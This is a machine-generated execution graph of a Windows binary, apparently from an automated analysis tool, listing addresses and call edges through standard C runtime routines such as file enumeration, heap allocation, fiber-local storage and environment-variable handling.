                                                                                                                                                                                                                                                              execution_graph 16095 7ff6e60b7e4c 16096 7ff6e60b7eb3 16095->16096 16097 7ff6e60b7e7a 16095->16097 16096->16097 16099 7ff6e60b7eb8 FindFirstFileExW 16096->16099 16098 7ff6e60b54c4 _set_fmode 11 API calls 16097->16098 16100 7ff6e60b7e7f 16098->16100 16101 7ff6e60b7f21 16099->16101 16102 7ff6e60b7eda GetLastError 16099->16102 16103 7ff6e60baea4 _invalid_parameter_noinfo 37 API calls 16100->16103 16155 7ff6e60b80bc 16101->16155 16105 7ff6e60b7f11 16102->16105 16106 7ff6e60b7ee5 16102->16106 16107 7ff6e60b7e8a 16103->16107 16108 7ff6e60b54c4 _set_fmode 11 API calls 16105->16108 16106->16105 16111 7ff6e60b7f01 16106->16111 16112 7ff6e60b7eef 16106->16112 16114 7ff6e60abcc0 _wfindfirst32i64 8 API calls 16107->16114 16108->16107 16110 7ff6e60b80bc _wfindfirst32i64 10 API calls 16115 7ff6e60b7f47 16110->16115 16113 7ff6e60b54c4 _set_fmode 11 API calls 16111->16113 16112->16105 16116 7ff6e60b7ef4 16112->16116 16113->16107 16118 7ff6e60b7e9e 16114->16118 16119 7ff6e60b80bc _wfindfirst32i64 10 API calls 16115->16119 16117 7ff6e60b54c4 _set_fmode 11 API calls 16116->16117 16117->16107 16120 7ff6e60b7f55 16119->16120 16121 7ff6e60c0e54 _wfindfirst32i64 37 API calls 16120->16121 16122 7ff6e60b7f73 16121->16122 16122->16107 16123 7ff6e60b7f7f 16122->16123 16124 7ff6e60baec4 _wfindfirst32i64 17 API calls 16123->16124 16125 7ff6e60b7f93 16124->16125 16126 7ff6e60b7fbd 16125->16126 16129 7ff6e60b7ffc FindNextFileW 16125->16129 16127 7ff6e60b54c4 _set_fmode 11 API calls 16126->16127 16128 7ff6e60b7fc2 16127->16128 16132 7ff6e60baea4 _invalid_parameter_noinfo 37 API calls 16128->16132 16130 7ff6e60b804c 16129->16130 16131 7ff6e60b800b GetLastError 16129->16131 16135 7ff6e60b80bc _wfindfirst32i64 10 API calls 16130->16135 16133 7ff6e60b803f 16131->16133 16134 7ff6e60b8016 16131->16134 16149 7ff6e60b7fcd 16132->16149 16136 7ff6e60b54c4 _set_fmode 11 API calls 16133->16136 16134->16133 16139 7ff6e60b8020 16134->16139 16140 7ff6e60b8032 16134->16140 16137 7ff6e60b8064 16135->16137 16136->16149 16138 7ff6e60b80bc _wfindfirst32i64 10 API calls 16137->16138 16142 7ff6e60b8072 16138->16142 16139->16133 16143 7ff6e60b8025 16139->16143 16144 7ff6e60b54c4 _set_fmode 11 API calls 16140->16144 16141 7ff6e60abcc0 _wfindfirst32i64 8 API calls 16145 7ff6e60b7fe0 16141->16145 16146 7ff6e60b80bc _wfindfirst32i64 10 API calls 16142->16146 16147 7ff6e60b54c4 _set_fmode 11 API calls 16143->16147 16144->16149 16148 7ff6e60b8080 16146->16148 16147->16149 16150 7ff6e60c0e54 _wfindfirst32i64 37 API calls 16148->16150 16149->16141 16151 7ff6e60b809e 16150->16151 16151->16149 16152 7ff6e60b80a6 16151->16152 16153 7ff6e60baec4 _wfindfirst32i64 17 API calls 16152->16153 16154 7ff6e60b80ba 16153->16154 16156 7ff6e60b80d4 16155->16156 16157 7ff6e60b80da FileTimeToSystemTime 16155->16157 16156->16157 16161 7ff6e60b80ff 16156->16161 16158 7ff6e60b80e9 SystemTimeToTzSpecificLocalTime 16157->16158 16157->16161 16158->16161 16159 7ff6e60abcc0 _wfindfirst32i64 8 API calls 16160 7ff6e60b7f39 16159->16160 16160->16110 16161->16159 15159 7ff6e60ab240 15160 7ff6e60ab26e 15159->15160 15161 7ff6e60ab255 15159->15161 15161->15160 15164 7ff6e60bdbbc 15161->15164 15165 7ff6e60bdc07 15164->15165 15169 7ff6e60bdbcb _set_fmode 15164->15169 15174 7ff6e60b54c4 15165->15174 15167 7ff6e60bdbee HeapAlloc 15168 7ff6e60ab2cc 15167->15168 15167->15169 15169->15165 15169->15167 15171 7ff6e60c3c00 15169->15171 15177 7ff6e60c3c40 15171->15177 15183 7ff6e60bb888 GetLastError 15174->15183 15176 7ff6e60b54cd 15176->15168 15182 7ff6e60c0cb8 EnterCriticalSection 15177->15182 15184 7ff6e60bb8c9 FlsSetValue 15183->15184 15189 7ff6e60bb8ac 15183->15189 15185 7ff6e60bb8b9 SetLastError 15184->15185 15186 7ff6e60bb8db 15184->15186 15185->15176 15200 7ff6e60bf158 15186->15200 15189->15184 15189->15185 15191 7ff6e60bb908 FlsSetValue 15193 7ff6e60bb914 FlsSetValue 15191->15193 15194 7ff6e60bb926 15191->15194 15192 7ff6e60bb8f8 FlsSetValue 15195 7ff6e60bb901 15192->15195 15193->15195 15213 7ff6e60bb4b8 15194->15213 15207 7ff6e60baf0c 15195->15207 15205 7ff6e60bf169 _set_fmode 15200->15205 15201 7ff6e60bf1ba 15204 7ff6e60b54c4 _set_fmode 10 API calls 15201->15204 15202 7ff6e60bf19e HeapAlloc 15203 7ff6e60bb8ea 15202->15203 15202->15205 15203->15191 15203->15192 15204->15203 15205->15201 15205->15202 15206 7ff6e60c3c00 _set_fmode 2 API calls 15205->15206 15206->15205 15208 7ff6e60baf11 RtlFreeHeap 15207->15208 15209 7ff6e60baf40 15207->15209 15208->15209 15210 7ff6e60baf2c GetLastError 15208->15210 15209->15185 15211 7ff6e60baf39 Concurrency::details::SchedulerProxy::DeleteThis 15210->15211 15212 7ff6e60b54c4 _set_fmode 9 API calls 15211->15212 15212->15209 15218 7ff6e60bb390 15213->15218 15230 7ff6e60c0cb8 EnterCriticalSection 15218->15230 15381 7ff6e60c0f38 15382 7ff6e60c0f5c 15381->15382 15384 7ff6e60c0f6c 15381->15384 15383 7ff6e60b54c4 _set_fmode 11 API calls 15382->15383 15406 7ff6e60c0f61 15383->15406 15385 7ff6e60c124c 15384->15385 15386 7ff6e60c0f8e 15384->15386 15387 7ff6e60b54c4 _set_fmode 11 API calls 15385->15387 15388 7ff6e60c0faf 15386->15388 15530 7ff6e60c15f4 15386->15530 15389 7ff6e60c1251 15387->15389 15392 7ff6e60c1021 15388->15392 15394 7ff6e60c0fd5 15388->15394 15400 7ff6e60c1015 15388->15400 15391 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15389->15391 15391->15406 15396 7ff6e60bf158 _set_fmode 11 API calls 15392->15396 15410 7ff6e60c0fe4 15392->15410 15393 7ff6e60c10ce 15405 7ff6e60c10eb 15393->15405 15411 7ff6e60c113d 15393->15411 15545 7ff6e60b9c50 15394->15545 15401 7ff6e60c1037 15396->15401 15399 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15399->15406 15400->15393 15400->15410 15551 7ff6e60c79fc 15400->15551 15402 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15401->15402 15407 7ff6e60c1045 15402->15407 15403 7ff6e60c0fdf 15408 7ff6e60b54c4 _set_fmode 11 API calls 15403->15408 15404 7ff6e60c0ffd 15404->15400 15413 7ff6e60c15f4 45 API calls 15404->15413 15409 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15405->15409 15407->15400 15407->15410 15415 7ff6e60bf158 _set_fmode 11 API calls 15407->15415 15408->15410 15412 7ff6e60c10f4 15409->15412 15410->15399 15411->15410 15414 7ff6e60c3a4c 40 API calls 15411->15414 15419 7ff6e60c3a4c 40 API calls 15412->15419 15423 7ff6e60c10f9 15412->15423 15413->15400 15416 7ff6e60c117a 15414->15416 15417 7ff6e60c1067 15415->15417 15418 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15416->15418 15420 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15417->15420 15421 7ff6e60c1184 15418->15421 15424 7ff6e60c1125 15419->15424 15420->15400 15421->15410 15421->15423 15422 7ff6e60c1240 15425 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15422->15425 15423->15422 15427 7ff6e60bf158 _set_fmode 11 API calls 15423->15427 15426 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15424->15426 15425->15406 15426->15423 15428 7ff6e60c11c8 15427->15428 15429 7ff6e60c11d0 15428->15429 15430 7ff6e60c11d9 15428->15430 15431 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15429->15431 15512 7ff6e60baa3c 15430->15512 15451 7ff6e60c11d7 15431->15451 15434 7ff6e60c11f0 15587 7ff6e60c7b14 15434->15587 15435 7ff6e60c127b 15436 7ff6e60baec4 _wfindfirst32i64 17 API calls 15435->15436 15439 7ff6e60c128f 15436->15439 15437 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15437->15406 15441 7ff6e60c12b8 15439->15441 15446 7ff6e60c12c8 15439->15446 15444 7ff6e60b54c4 _set_fmode 11 API calls 15441->15444 15442 7ff6e60c1238 15445 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15442->15445 15443 7ff6e60c1217 15447 7ff6e60b54c4 _set_fmode 11 API calls 15443->15447 15474 7ff6e60c12bd 15444->15474 15445->15422 15449 7ff6e60c15ab 15446->15449 15452 7ff6e60c12ea 15446->15452 15448 7ff6e60c121c 15447->15448 15450 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15448->15450 15453 7ff6e60b54c4 _set_fmode 11 API calls 15449->15453 15450->15451 15451->15437 15454 7ff6e60c1307 15452->15454 15606 7ff6e60c16dc 15452->15606 15455 7ff6e60c15b0 15453->15455 15458 7ff6e60c137b 15454->15458 15459 7ff6e60c132f 15454->15459 15464 7ff6e60c136f 15454->15464 15457 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15455->15457 15457->15474 15461 7ff6e60c13a3 15458->15461 15465 7ff6e60bf158 _set_fmode 11 API calls 15458->15465 15479 7ff6e60c133e 15458->15479 15621 7ff6e60b9c8c 15459->15621 15460 7ff6e60c142e 15473 7ff6e60c144b 15460->15473 15480 7ff6e60c149e 15460->15480 15461->15464 15467 7ff6e60bf158 _set_fmode 11 API calls 15461->15467 15461->15479 15464->15460 15464->15479 15627 7ff6e60c78bc 15464->15627 15469 7ff6e60c1395 15465->15469 15472 7ff6e60c13c5 15467->15472 15468 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15468->15474 15475 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15469->15475 15470 7ff6e60c1339 15476 7ff6e60b54c4 _set_fmode 11 API calls 15470->15476 15471 7ff6e60c1357 15471->15464 15482 7ff6e60c16dc 45 API calls 15471->15482 15477 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15472->15477 15478 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15473->15478 15475->15461 15476->15479 15477->15464 15481 7ff6e60c1454 15478->15481 15479->15468 15480->15479 15521 7ff6e60c3a4c 15480->15521 15486 7ff6e60c3a4c 40 API calls 15481->15486 15488 7ff6e60c145a 15481->15488 15482->15464 15484 7ff6e60c14dc 15485 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15484->15485 15490 7ff6e60c14e6 15485->15490 15489 7ff6e60c1486 15486->15489 15487 7ff6e60c159f 15492 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15487->15492 15488->15487 15493 7ff6e60bf158 _set_fmode 11 API calls 15488->15493 15491 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15489->15491 15490->15479 15490->15488 15491->15488 15492->15474 15494 7ff6e60c152b 15493->15494 15495 7ff6e60c1533 15494->15495 15496 7ff6e60c153c 15494->15496 15497 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15495->15497 15651 7ff6e60c0e54 15496->15651 15499 7ff6e60c153a 15497->15499 15504 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15499->15504 15501 7ff6e60c15df 15503 7ff6e60baec4 _wfindfirst32i64 17 API calls 15501->15503 15502 7ff6e60c1552 SetEnvironmentVariableW 15505 7ff6e60c1597 15502->15505 15506 7ff6e60c1576 15502->15506 15507 7ff6e60c15f3 15503->15507 15504->15474 15508 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15505->15508 15509 7ff6e60b54c4 _set_fmode 11 API calls 15506->15509 15508->15487 15510 7ff6e60c157b 15509->15510 15511 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15510->15511 15511->15499 15513 7ff6e60baa53 15512->15513 15514 7ff6e60baa49 15512->15514 15515 7ff6e60b54c4 _set_fmode 11 API calls 15513->15515 15514->15513 15519 7ff6e60baa6e 15514->15519 15516 7ff6e60baa5a 15515->15516 15517 7ff6e60baea4 _invalid_parameter_noinfo 37 API calls 15516->15517 15518 7ff6e60baa66 15517->15518 15518->15434 15518->15435 15519->15518 15520 7ff6e60b54c4 _set_fmode 11 API calls 15519->15520 15520->15516 15522 7ff6e60c3a6e 15521->15522 15523 7ff6e60c3a8b 15521->15523 15522->15523 15524 7ff6e60c3a7c 15522->15524 15525 7ff6e60c3a95 15523->15525 15672 7ff6e60c8508 15523->15672 15527 7ff6e60b54c4 _set_fmode 11 API calls 15524->15527 15660 7ff6e60c0ebc 15525->15660 15529 7ff6e60c3a81 __scrt_get_show_window_mode 15527->15529 15529->15484 15531 7ff6e60c1629 15530->15531 15537 7ff6e60c1611 15530->15537 15532 7ff6e60bf158 _set_fmode 11 API calls 15531->15532 15540 7ff6e60c164d 15532->15540 15533 7ff6e60baa9c __GetCurrentState 45 API calls 15535 7ff6e60c16d8 15533->15535 15534 7ff6e60c16ae 15536 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15534->15536 15536->15537 15537->15388 15538 7ff6e60bf158 _set_fmode 11 API calls 15538->15540 15539 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15539->15540 15540->15534 15540->15538 15540->15539 15541 7ff6e60baa3c __std_exception_copy 37 API calls 15540->15541 15542 7ff6e60c16bd 15540->15542 15544 7ff6e60c16d2 15540->15544 15541->15540 15543 7ff6e60baec4 _wfindfirst32i64 17 API calls 15542->15543 15543->15544 15544->15533 15546 7ff6e60b9c60 15545->15546 15547 7ff6e60b9c69 15545->15547 15546->15547 15679 7ff6e60b9728 15546->15679 15547->15403 15547->15404 15552 7ff6e60c7a09 15551->15552 15553 7ff6e60c6bac 15551->15553 15555 7ff6e60b4f98 45 API calls 15552->15555 15554 7ff6e60c6bb9 15553->15554 15561 7ff6e60c6bef 15553->15561 15558 7ff6e60b54c4 _set_fmode 11 API calls 15554->15558 15566 7ff6e60c6b60 15554->15566 15557 7ff6e60c7a3d 15555->15557 15556 7ff6e60c6c19 15559 7ff6e60b54c4 _set_fmode 11 API calls 15556->15559 15563 7ff6e60c7a53 15557->15563 15568 7ff6e60c7a6a 15557->15568 15580 7ff6e60c7a42 15557->15580 15560 7ff6e60c6bc3 15558->15560 15562 7ff6e60c6c1e 15559->15562 15564 7ff6e60baea4 _invalid_parameter_noinfo 37 API calls 15560->15564 15561->15556 15565 7ff6e60c6c3e 15561->15565 15567 7ff6e60baea4 _invalid_parameter_noinfo 37 API calls 15562->15567 15569 7ff6e60b54c4 _set_fmode 11 API calls 15563->15569 15570 7ff6e60c6bce 15564->15570 15571 7ff6e60b4f98 45 API calls 15565->15571 15575 7ff6e60c6c29 15565->15575 15566->15400 15567->15575 15572 7ff6e60c7a74 15568->15572 15573 7ff6e60c7a86 15568->15573 15574 7ff6e60c7a58 15569->15574 15570->15400 15571->15575 15576 7ff6e60b54c4 _set_fmode 11 API calls 15572->15576 15577 7ff6e60c7aae 15573->15577 15578 7ff6e60c7a97 15573->15578 15579 7ff6e60baea4 _invalid_parameter_noinfo 37 API calls 15574->15579 15575->15400 15581 7ff6e60c7a79 15576->15581 15974 7ff6e60c9824 15577->15974 15965 7ff6e60c6bfc 15578->15965 15579->15580 15580->15400 15584 7ff6e60baea4 _invalid_parameter_noinfo 37 API calls 15581->15584 15584->15580 15586 7ff6e60b54c4 _set_fmode 11 API calls 15586->15580 15588 7ff6e60b4f98 45 API calls 15587->15588 15589 7ff6e60c7b7a 15588->15589 15590 7ff6e60c7b88 15589->15590 16014 7ff6e60bf3e4 15589->16014 16017 7ff6e60b5584 15590->16017 15594 7ff6e60c7c74 15596 7ff6e60c7c85 15594->15596 15597 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15594->15597 15595 7ff6e60b4f98 45 API calls 15599 7ff6e60c7bf7 15595->15599 15598 7ff6e60c1213 15596->15598 15601 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15596->15601 15597->15596 15598->15442 15598->15443 15600 7ff6e60bf3e4 5 API calls 15599->15600 15602 7ff6e60c7c00 15599->15602 15600->15602 15601->15598 15603 7ff6e60b5584 14 API calls 15602->15603 15604 7ff6e60c7c5b 15603->15604 15604->15594 15605 7ff6e60c7c63 SetEnvironmentVariableW 15604->15605 15605->15594 15607 7ff6e60c171c 15606->15607 15608 7ff6e60c16ff 15606->15608 15609 7ff6e60bf158 _set_fmode 11 API calls 15607->15609 15608->15454 15616 7ff6e60c1740 15609->15616 15610 7ff6e60c17c4 15612 7ff6e60baa9c __GetCurrentState 45 API calls 15610->15612 15611 7ff6e60c17a1 15613 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15611->15613 15614 7ff6e60c17ca 15612->15614 15613->15608 15615 7ff6e60bf158 _set_fmode 11 API calls 15615->15616 15616->15610 15616->15611 15616->15615 15617 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15616->15617 15618 7ff6e60c0e54 _wfindfirst32i64 37 API calls 15616->15618 15619 7ff6e60c17b0 15616->15619 15617->15616 15618->15616 15620 7ff6e60baec4 _wfindfirst32i64 17 API calls 15619->15620 15620->15610 15622 7ff6e60b9c9c 15621->15622 15625 7ff6e60b9ca5 15621->15625 15622->15625 16044 7ff6e60b979c 15622->16044 15625->15470 15625->15471 15628 7ff6e60c78c9 15627->15628 15631 7ff6e60c78f6 15627->15631 15629 7ff6e60c78ce 15628->15629 15628->15631 15630 7ff6e60b54c4 _set_fmode 11 API calls 15629->15630 15633 7ff6e60c78d3 15630->15633 15632 7ff6e60c793a 15631->15632 15635 7ff6e60c7959 15631->15635 15649 7ff6e60c792e __crtLCMapStringW 15631->15649 15634 7ff6e60b54c4 _set_fmode 11 API calls 15632->15634 15636 7ff6e60baea4 _invalid_parameter_noinfo 37 API calls 15633->15636 15637 7ff6e60c793f 15634->15637 15638 7ff6e60c7975 15635->15638 15639 7ff6e60c7963 15635->15639 15640 7ff6e60c78de 15636->15640 15641 7ff6e60baea4 _invalid_parameter_noinfo 37 API calls 15637->15641 15643 7ff6e60b4f98 45 API calls 15638->15643 15642 7ff6e60b54c4 _set_fmode 11 API calls 15639->15642 15640->15464 15641->15649 15645 7ff6e60c7968 15642->15645 15644 7ff6e60c7982 15643->15644 15644->15649 16091 7ff6e60c93e0 15644->16091 15646 7ff6e60baea4 _invalid_parameter_noinfo 37 API calls 15645->15646 15646->15649 15649->15464 15650 7ff6e60b54c4 _set_fmode 11 API calls 15650->15649 15652 7ff6e60c0e61 15651->15652 15653 7ff6e60c0e6b 15651->15653 15652->15653 15658 7ff6e60c0e87 15652->15658 15654 7ff6e60b54c4 _set_fmode 11 API calls 15653->15654 15655 7ff6e60c0e73 15654->15655 15656 7ff6e60baea4 _invalid_parameter_noinfo 37 API calls 15655->15656 15657 7ff6e60c0e7f 15656->15657 15657->15501 15657->15502 15658->15657 15659 7ff6e60b54c4 _set_fmode 11 API calls 15658->15659 15659->15655 15661 7ff6e60c0ed1 15660->15661 15662 7ff6e60c0edb 15660->15662 15664 7ff6e60bdbbc _fread_nolock 12 API calls 15661->15664 15663 7ff6e60c0ee0 15662->15663 15670 7ff6e60c0ee7 _set_fmode 15662->15670 15665 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15663->15665 15668 7ff6e60c0ed9 15664->15668 15665->15668 15666 7ff6e60c0eed 15669 7ff6e60b54c4 _set_fmode 11 API calls 15666->15669 15667 7ff6e60c0f1a RtlReAllocateHeap 15667->15668 15667->15670 15668->15529 15669->15668 15670->15666 15670->15667 15671 7ff6e60c3c00 _set_fmode 2 API calls 15670->15671 15671->15670 15673 7ff6e60c8511 15672->15673 15674 7ff6e60c852a HeapSize 15672->15674 15675 7ff6e60b54c4 _set_fmode 11 API calls 15673->15675 15676 7ff6e60c8516 15675->15676 15677 7ff6e60baea4 _invalid_parameter_noinfo 37 API calls 15676->15677 15678 7ff6e60c8521 15677->15678 15678->15525 15680 7ff6e60b9741 15679->15680 15689 7ff6e60b973d 15679->15689 15702 7ff6e60c2c60 15680->15702 15685 7ff6e60b975f 15728 7ff6e60b980c 15685->15728 15686 7ff6e60b9753 15687 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15686->15687 15687->15689 15689->15547 15694 7ff6e60b9a7c 15689->15694 15691 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15692 7ff6e60b9786 15691->15692 15693 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15692->15693 15693->15689 15695 7ff6e60b9aa5 15694->15695 15700 7ff6e60b9abe 15694->15700 15695->15547 15696 7ff6e60c04c8 WideCharToMultiByte 15696->15700 15697 7ff6e60bf158 _set_fmode 11 API calls 15697->15700 15698 7ff6e60b9b4e 15699 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15698->15699 15699->15695 15700->15695 15700->15696 15700->15697 15700->15698 15701 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15700->15701 15701->15700 15703 7ff6e60b9746 15702->15703 15704 7ff6e60c2c6d 15702->15704 15708 7ff6e60c2f9c GetEnvironmentStringsW 15703->15708 15747 7ff6e60bb7e4 15704->15747 15709 7ff6e60b974b 15708->15709 15710 7ff6e60c2fcc 15708->15710 15709->15685 15709->15686 15711 7ff6e60c04c8 WideCharToMultiByte 15710->15711 15712 7ff6e60c301d 15711->15712 15713 7ff6e60c3024 FreeEnvironmentStringsW 15712->15713 15714 7ff6e60bdbbc _fread_nolock 12 API calls 15712->15714 15713->15709 15715 7ff6e60c3037 15714->15715 15716 7ff6e60c303f 15715->15716 15717 7ff6e60c3048 15715->15717 15718 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15716->15718 15719 7ff6e60c04c8 WideCharToMultiByte 15717->15719 15720 7ff6e60c3046 15718->15720 15721 7ff6e60c306b 15719->15721 15720->15713 15722 7ff6e60c306f 15721->15722 15723 7ff6e60c3079 15721->15723 15725 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15722->15725 15724 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15723->15724 15726 7ff6e60c3077 FreeEnvironmentStringsW 15724->15726 15725->15726 15726->15709 15729 7ff6e60b9831 15728->15729 15730 7ff6e60bf158 _set_fmode 11 API calls 15729->15730 15731 7ff6e60b9867 15730->15731 15734 7ff6e60b98e2 15731->15734 15736 7ff6e60bf158 _set_fmode 11 API calls 15731->15736 15737 7ff6e60b98d1 15731->15737 15739 7ff6e60baa3c __std_exception_copy 37 API calls 15731->15739 15741 7ff6e60b9907 15731->15741 15743 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15731->15743 15744 7ff6e60b986f 15731->15744 15732 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15733 7ff6e60b9767 15732->15733 15733->15691 15735 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15734->15735 15735->15733 15736->15731 15959 7ff6e60b9a38 15737->15959 15739->15731 15745 7ff6e60baec4 _wfindfirst32i64 17 API calls 15741->15745 15742 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15742->15744 15743->15731 15744->15732 15746 7ff6e60b991a 15745->15746 15748 7ff6e60bb810 FlsSetValue 15747->15748 15749 7ff6e60bb7f5 FlsGetValue 15747->15749 15750 7ff6e60bb802 15748->15750 15752 7ff6e60bb81d 15748->15752 15749->15750 15751 7ff6e60bb80a 15749->15751 15753 7ff6e60bb808 15750->15753 15754 7ff6e60baa9c __GetCurrentState 45 API calls 15750->15754 15751->15748 15755 7ff6e60bf158 _set_fmode 11 API calls 15752->15755 15767 7ff6e60c2934 15753->15767 15756 7ff6e60bb885 15754->15756 15757 7ff6e60bb82c 15755->15757 15758 7ff6e60bb84a FlsSetValue 15757->15758 15759 7ff6e60bb83a FlsSetValue 15757->15759 15761 7ff6e60bb868 15758->15761 15762 7ff6e60bb856 FlsSetValue 15758->15762 15760 7ff6e60bb843 15759->15760 15764 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15760->15764 15763 7ff6e60bb4b8 _set_fmode 11 API calls 15761->15763 15762->15760 15765 7ff6e60bb870 15763->15765 15764->15750 15766 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15765->15766 15766->15753 15790 7ff6e60c2ba4 15767->15790 15769 7ff6e60c2969 15805 7ff6e60c2634 15769->15805 15772 7ff6e60bdbbc _fread_nolock 12 API calls 15773 7ff6e60c2997 15772->15773 15774 7ff6e60c299f 15773->15774 15777 7ff6e60c29ae 15773->15777 15775 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15774->15775 15776 7ff6e60c2986 15775->15776 15776->15703 15777->15777 15812 7ff6e60c2cdc 15777->15812 15780 7ff6e60c2aaa 15781 7ff6e60b54c4 _set_fmode 11 API calls 15780->15781 15782 7ff6e60c2aaf 15781->15782 15785 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15782->15785 15783 7ff6e60c2b05 15784 7ff6e60c2b6c 15783->15784 15823 7ff6e60c2464 15783->15823 15788 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15784->15788 15785->15776 15786 7ff6e60c2ac4 15786->15783 15789 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15786->15789 15788->15776 15789->15783 15791 7ff6e60c2bc7 15790->15791 15794 7ff6e60c2bd1 15791->15794 15838 7ff6e60c0cb8 EnterCriticalSection 15791->15838 15793 7ff6e60c2c43 15793->15769 15794->15793 15797 7ff6e60baa9c __GetCurrentState 45 API calls 15794->15797 15798 7ff6e60c2c5b 15797->15798 15801 7ff6e60c2cb2 15798->15801 15802 7ff6e60bb7e4 50 API calls 15798->15802 15801->15769 15803 7ff6e60c2c9c 15802->15803 15804 7ff6e60c2934 65 API calls 15803->15804 15804->15801 15839 7ff6e60b4f98 15805->15839 15808 7ff6e60c2654 GetOEMCP 15811 7ff6e60c267b 15808->15811 15809 7ff6e60c2666 15810 7ff6e60c266b GetACP 15809->15810 15809->15811 15810->15811 15811->15772 15811->15776 15813 7ff6e60c2634 47 API calls 15812->15813 15814 7ff6e60c2d09 15813->15814 15815 7ff6e60c2e5f 15814->15815 15817 7ff6e60c2d46 IsValidCodePage 15814->15817 15822 7ff6e60c2d60 __scrt_get_show_window_mode 15814->15822 15816 7ff6e60abcc0 _wfindfirst32i64 8 API calls 15815->15816 15818 7ff6e60c2aa1 15816->15818 15817->15815 15819 7ff6e60c2d57 15817->15819 15818->15780 15818->15786 15820 7ff6e60c2d86 GetCPInfo 15819->15820 15819->15822 15820->15815 15820->15822 15871 7ff6e60c274c 15822->15871 15958 7ff6e60c0cb8 EnterCriticalSection 15823->15958 15840 7ff6e60b4fbc 15839->15840 15846 7ff6e60b4fb7 15839->15846 15841 7ff6e60bb710 __GetCurrentState 45 API calls 15840->15841 15840->15846 15842 7ff6e60b4fd7 15841->15842 15847 7ff6e60bdf44 15842->15847 15846->15808 15846->15809 15848 7ff6e60b4ffa 15847->15848 15849 7ff6e60bdf59 15847->15849 15851 7ff6e60bdfb0 15848->15851 15849->15848 15855 7ff6e60c3974 15849->15855 15852 7ff6e60bdfc5 15851->15852 15853 7ff6e60bdfd8 15851->15853 15852->15853 15868 7ff6e60c2cc0 15852->15868 15853->15846 15856 7ff6e60bb710 __GetCurrentState 45 API calls 15855->15856 15857 7ff6e60c3983 15856->15857 15858 7ff6e60c39ce 15857->15858 15867 7ff6e60c0cb8 EnterCriticalSection 15857->15867 15858->15848 15869 7ff6e60bb710 __GetCurrentState 45 API calls 15868->15869 15870 7ff6e60c2cc9 15869->15870 15872 7ff6e60c2789 GetCPInfo 15871->15872 15881 7ff6e60c287f 15871->15881 15877 7ff6e60c279c 15872->15877 15872->15881 15873 7ff6e60abcc0 _wfindfirst32i64 8 API calls 15874 7ff6e60c291e 15873->15874 15874->15815 15882 7ff6e60c34b0 15877->15882 15881->15873 15883 7ff6e60b4f98 45 API calls 15882->15883 15884 7ff6e60c34f2 15883->15884 15902 7ff6e60bfc00 15884->15902 15904 7ff6e60bfc09 MultiByteToWideChar 15902->15904 15963 7ff6e60b9a3d 15959->15963 15964 7ff6e60b98d9 15959->15964 15960 7ff6e60b9a66 15962 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15960->15962 15961 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15961->15963 15962->15964 15963->15960 15963->15961 15964->15742 15966 